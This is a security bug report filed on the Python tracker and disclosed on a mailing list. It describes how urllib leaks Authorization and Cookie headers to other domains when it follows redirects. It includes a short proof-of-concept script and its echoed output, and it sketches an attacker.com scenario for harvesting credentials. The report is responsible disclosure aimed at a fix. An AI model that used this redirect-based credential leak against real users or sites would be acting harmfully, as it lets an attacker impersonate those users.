New submission from Artem Smotrakov <artem.smotra...@gmail.com>: After discussing it on secur...@python.org, it was decided to disclose it. Here is the original report:
Hello Python Security Team, Looks like urllib may leak sensitive HTTP headers to third parties when handling redirects. Let's consider the following environment: - http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via basic HTTP authentication scheme - http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns 301 code, and redirects a client to the specified URL - http://headers.gypsyengineer.com just prints out all HTTP headers which a web browser sent Let's then consider the following scenario: - create an instance of urllib.request.Request to open 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com' - call urllib.request.Request.add_header() method to set Authorization and Cookie headers - call urllib.request.urlopen() method to open a connection Here is what happens next: - urllib sends the HTTP authentication header to httpleak.gypsyengineer.com as expected - redirect.php returns 301 code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains) - urllib processes 301 code and makes a request to http://headers.gypsyengineer.com The problem is that urllib sends the Authorization and Cookie headers headers to http://headers.gypsyengineer.com as well. Let's imagine that a user is authenticated on a web site via one of HTTP authentication schemes (basic, digest, NTLM, SPNEGO/Kerberos), and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php If an attacker can trick the user to open http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com, then urllib is going to send sensitive headers to http://attacker.com where the attacker can gather them. As a result, the attacker can imporsonate the user on the original web site. Here is a simple POC which shows the problem: import urllib.request req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com') req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==') req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com'); with urllib.request.urlopen(req) as f: print(f.read(2048).decode("utf-8")) Running this code results to loading http://headers.gypsyengineer.com which prints out Authorization and Cookie headers which are supposed to be sent only to httpleak.gypsyengineer.com: Hello, I am <b>headers.gypsyengineer.com</b></br></br> Here are HTTP headers you just sent me:</br></br> Accept-Encoding: identity</br> User-Agent: Python-urllib/3.8</br> <b>Authorization: Basic YWRtaW46dGVzdA==</br></b> <b>Cookie: This is only for httpleak.gypsyengineer.com</br></b> Host: headers.gypsyengineer.com</br> Cache-Control: max-age=259200</br> Connection: keep-alive</br> I could reproduce it with 3.5.2, and latest build of https://github.com/python/cpython If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects. Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks! Artem ---------- components: Library (Lib) messages: 317793 nosy: alex, artem.smotrakov priority: normal severity: normal status: open title: urllib may leak sensitive HTTP headers to a third-party web site type: security versions: Python 3.5 _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue33661> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com